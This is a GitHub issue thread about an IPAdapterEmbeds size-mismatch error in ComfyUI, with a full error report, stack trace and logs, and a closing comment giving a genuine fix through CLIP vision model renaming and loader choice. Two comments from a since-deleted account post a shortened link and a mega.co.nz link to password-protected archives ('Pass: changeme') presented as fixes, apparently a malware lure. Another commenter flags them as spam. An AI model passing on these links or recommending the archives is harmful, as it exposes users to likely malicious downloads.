### ISSUE TITLE
IPAdapterEmbeds Error(s) in loading state_dict for ImageProjModel: size mismatch for proj.weight: copying a param with shape torch.Size([3072, 1024]) from checkpoint, the shape in current model is torch.Size([3072, 1280]).

### ISSUE THREAD

**Issue by AdvertiserM** [cubiq/ComfyUI_IPAdapter_plus#726]
![image](https://github.com/user-attachments/assets/b9b8f698-37b4-4051-afda-0d03c0ed0291)

![image](https://github.com/user-attachments/assets/333a42b4-0d55-4d66-a50f-ff66d4437bde)

![image](https://github.com/user-attachments/assets/ce5389ba-f3b1-4b12-a9b5-5089bf44c495)

![image](https://github.com/user-attachments/assets/89073950-0703-428c-9690-a0df836a1828)

![image](https://github.com/user-attachments/assets/e7320cc6-5dcb-42e9-9b8e-acafaa972e0b)

# ComfyUI Error Report
## Error Details
- **Node Type:** IPAdapterEmbeds
- **Exception Type:** RuntimeError
- **Exception Message:** Error(s) in loading state_dict for ImageProjModel:
	size mismatch for proj.weight: copying a param with shape torch.Size([3072, 1024]) from checkpoint, the shape in current model is torch.Size([3072, 1280]).
## Stack Trace
```
  File "D:\comfy\ComfyUI_windows_portable\ComfyUI\execution.py", line 323, in execute
    output_data, output_ui, has_subgraph = get_output_data(obj, input_data_all, execution_block_cb=execution_block_cb, pre_execute_cb=pre_execute_cb)
                                           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

  File "D:\comfy\ComfyUI_windows_portable\ComfyUI\execution.py", line 198, in get_output_data
    return_values = _map_node_over_list(obj, input_data_all, obj.FUNCTION, allow_interrupt=True, execution_block_cb=execution_block_cb, pre_execute_cb=pre_execute_cb)
                    ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

  File "D:\comfy\ComfyUI_windows_portable\ComfyUI\execution.py", line 169, in _map_node_over_list
    process_inputs(input_dict, i)

  File "D:\comfy\ComfyUI_windows_portable\ComfyUI\execution.py", line 158, in process_inputs
    results.append(getattr(obj, func)(**inputs))
                   ^^^^^^^^^^^^^^^^^^^^^^^^^^^^

  File "D:\comfy\ComfyUI_windows_portable\ComfyUI\custom_nodes\ComfyUI_IPAdapter_plus\IPAdapterPlus.py", line 1180, in apply_ipadapter
    return ipadapter_execute(model.clone(), ipadapter_model, clip_vision, **ipa_args)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

  File "D:\comfy\ComfyUI_windows_portable\ComfyUI\custom_nodes\ComfyUI_IPAdapter_plus\IPAdapterPlus.py", line 441, in ipadapter_execute
    ipa = IPAdapter(
          ^^^^^^^^^^

  File "D:\comfy\ComfyUI_windows_portable\ComfyUI\custom_nodes\ComfyUI_IPAdapter_plus\IPAdapterPlus.py", line 71, in __init__
    self.image_proj_model.load_state_dict(ipadapter_model["image_proj"])

  File "D:\comfy\ComfyUI_windows_portable\python_embeded\Lib\site-packages\torch\nn\modules\module.py", line 2215, in load_state_dict
    raise RuntimeError('Error(s) in loading state_dict for {}:\n\t{}'.format(

```
## System Information
- **ComfyUI Version:** v0.2.2-81-g3bb4dec
- **Arguments:** ComfyUI\main.py --windows-standalone-build
- **OS:** nt
- **Python Version:** 3.11.9 (tags/v3.11.9:de54cf5, Apr  2 2024, 10:12:12) [MSC v.1938 64 bit (AMD64)]
- **Embedded Python:** true
- **PyTorch Version:** 2.4.1+cu124
## Devices

- **Name:** cuda:0 NVIDIA GeForce RTX 3090 : cudaMallocAsync
  - **Type:** cuda
  - **VRAM Total:** 25769279488
  - **VRAM Free:** 17067982952
  - **Torch VRAM Total:** 7784628224
  - **Torch VRAM Free:** 481607784

## Logs
```
2024-09-28 21:54:55,346 - root - INFO - Total VRAM 24576 MB, total RAM 32581 MB
2024-09-28 21:54:55,346 - root - INFO - pytorch version: 2.4.1+cu124
2024-09-28 21:54:55,347 - root - INFO - Set vram state to: NORMAL_VRAM
2024-09-28 21:54:55,347 - root - INFO - Device: cuda:0 NVIDIA GeForce RTX 3090 : cudaMallocAsync
2024-09-28 21:54:56,227 - root - INFO - Using pytorch cross attention
2024-09-28 21:54:57,546 - root - INFO - [Prompt Server] web root: D:\comfy\ComfyUI_windows_portable\ComfyUI\web
2024-09-28 21:54:58,215 - root - INFO - Total VRAM 24576 MB, total RAM 32581 MB
2024-09-28 21:54:58,215 - root - INFO - pytorch version: 2.4.1+cu124
2024-09-28 21:54:58,215 - root - INFO - Set vram state to: NORMAL_VRAM
2024-09-28 21:54:58,216 - root - INFO - Device: cuda:0 NVIDIA GeForce RTX 3090 : cudaMallocAsync
2024-09-28 21:54:58,501 - root - WARNING - Traceback (most recent call last):
  File "D:\comfy\ComfyUI_windows_portable\ComfyUI\nodes.py", line 1998, in load_custom_node
    module_spec.loader.exec_module(module)
  File "<frozen importlib._bootstrap_external>", line 940, in exec_module
  File "<frozen importlib._bootstrap>", line 241, in _call_with_frames_removed
  File "D:\comfy\ComfyUI_windows_portable\ComfyUI\custom_nodes\comfyui-reactor-node\__init__.py", line 23, in <module>
    from .nodes import NODE_CLASS_MAPPINGS, NODE_DISPLAY_NAME_MAPPINGS
  File "D:\comfy\ComfyUI_windows_portable\ComfyUI\custom_nodes\comfyui-reactor-node\nodes.py", line 15, in <module>
    from insightface.app.common import Face
ModuleNotFoundError: No module named 'insightface'

2024-09-28 21:54:58,501 - root - WARNING - Cannot import D:\comfy\ComfyUI_windows_portable\ComfyUI\custom_nodes\comfyui-reactor-node module for custom nodes: No module named 'insightface'
2024-09-28 21:54:59,203 - numexpr.utils - INFO - Note: NumExpr detected 24 cores but "NUMEXPR_MAX_THREADS" not set, so enforcing safe limit of 16.
2024-09-28 21:54:59,204 - numexpr.utils - INFO - NumExpr defaulting to 16 threads.
2024-09-28 21:54:59,602 - root - INFO - 
Import times for custom nodes:
2024-09-28 21:54:59,602 - root - INFO -    0.0 seconds: D:\comfy\ComfyUI_windows_portable\ComfyUI\custom_nodes\websocket_image_save.py
2024-09-28 21:54:59,603 - root - INFO -    0.0 seconds: D:\comfy\ComfyUI_windows_portable\ComfyUI\custom_nodes\ComfyUI-Image-Selector
2024-09-28 21:54:59,603 - root - INFO -    0.0 seconds: D:\comfy\ComfyUI_windows_portable\ComfyUI\custom_nodes\ComfyUI_IPAdapter_plus
2024-09-28 21:54:59,603 - root - INFO -    0.0 seconds: D:\comfy\ComfyUI_windows_portable\ComfyUI\custom_nodes\mikey_nodes
2024-09-28 21:54:59,603 - root - INFO -    0.0 seconds (IMPORT FAILED): D:\comfy\ComfyUI_windows_portable\ComfyUI\custom_nodes\comfyui-reactor-node
2024-09-28 21:54:59,603 - root - INFO -    0.0 seconds: D:\comfy\ComfyUI_windows_portable\ComfyUI\custom_nodes\ComfyUI-Advanced-ControlNet
2024-09-28 21:54:59,603 - root - INFO -    0.0 seconds: D:\comfy\ComfyUI_windows_portable\ComfyUI\custom_nodes\efficiency-nodes-comfyui
2024-09-28 21:54:59,603 - root - INFO -    0.0 seconds: D:\comfy\ComfyUI_windows_portable\ComfyUI\custom_nodes\rgthree-comfy
2024-09-28 21:54:59,603 - root - INFO -    0.0 seconds: D:\comfy\ComfyUI_windows_portable\ComfyUI\custom_nodes\ComfyUI_essentials
2024-09-28 21:54:59,603 - root - INFO -    0.0 seconds: D:\comfy\ComfyUI_windows_portable\ComfyUI\custom_nodes\comfyui_controlnet_aux
2024-09-28 21:54:59,603 - root - INFO -    0.1 seconds: D:\comfy\ComfyUI_windows_portable\ComfyUI\custom_nodes\ComfyUI-KJNodes
2024-09-28 21:54:59,603 - root - INFO -    0.1 seconds: D:\comfy\ComfyUI_windows_portable\ComfyUI\custom_nodes\ComfyUI-VideoHelperSuite
2024-09-28 21:54:59,603 - root - INFO -    0.1 seconds: D:\comfy\ComfyUI_windows_portable\ComfyUI\custom_nodes\ComfyUI-AnimateDiff-Evolved
2024-09-28 21:54:59,603 - root - INFO -    0.1 seconds: D:\comfy\ComfyUI_windows_portable\ComfyUI\custom_nodes\facerestore_cf
2024-09-28 21:54:59,604 - root - INFO -    0.1 seconds: D:\comfy\ComfyUI_windows_portable\ComfyUI\custom_nodes\ComfyUI-Documents
2024-09-28 21:54:59,604 - root - INFO -    0.2 seconds: D:\comfy\ComfyUI_windows_portable\ComfyUI\custom_nodes\ComfyUI-Manager
2024-09-28 21:54:59,604 - root - INFO -    0.3 seconds: D:\comfy\ComfyUI_windows_portable\ComfyUI\custom_nodes\ComfyUI_FizzNodes
2024-09-28 21:54:59,604 - root - INFO -    0.6 seconds: D:\comfy\ComfyUI_windows_portable\ComfyUI\custom_nodes\ComfyUI-tbox
2024-09-28 21:54:59,604 - root - INFO - 
2024-09-28 21:54:59,610 - root - INFO - Starting server

**Comment by SagarChandra07** [comment]
I think this will help you.
https://bit.ly/47P0Nvo
Pass: changeme
I put the necessary dlls in the archive

**Comment by SagarChandra07** [comment]
This might help:This file might fix it

https://mega.co.nz/#!qq4nATTK!oDH5tb3NOJcsSw5fRGhLC8dvFpH3zFCn6U2esyTVcJA
Pass: changeme
If you don't have the c compliator, install it.(gcc or clang)

**Comment by rocky** [comment]
> I think this will help you.
> This might help:This file might fix it

SagarChandra07 who is now listed as a ghost user seems to have posted this in several other github repositories. In mine, I've hidden the comment which you might want to do the same (or delete) here and with this comment.

**Comment by valaskasz** [comment]
I have suffered for a long time with this issue. For me the solution was that there is two files in clip_vision directory, and rename them to the written name:
The clipvision models are the following and should be re-named like so:
CLIP-ViT-H-14-laion2B-s32B-b79K.safetensors
(https://huggingface.co/h94/IP-Adapter/resolve/main/models/image_encoder/model.safetensors) and 
CLIP-ViT-bigG-14-laion2B-39B-b160k.safetensors
(https://huggingface.co/h94/IP-Adapter/resolve/main/sdxl_models/image_encoder/model.safetensors)

The "big" file is the bigger, the first is smaller. If you swap the files (the small file will be the "big" name), you get an error.

The other issue at me that I used IPAdapter with IPAdapter Unified Community. If I used IPAdapter Unified loader, it worked.

I have cleared the cache in comfyUI\Custom nodes\_pycache_ directory

You have to download all IPAdapter files to models\ipadapter directory (if you use SD) model you have to download the IPAdapter for SD models, if you use the SDXL model, you have to use IPAdapter for SDXL, but you can use only one type at the same time (this is my experience, but not sure)

Also, restart ComfyUI if you change the files.
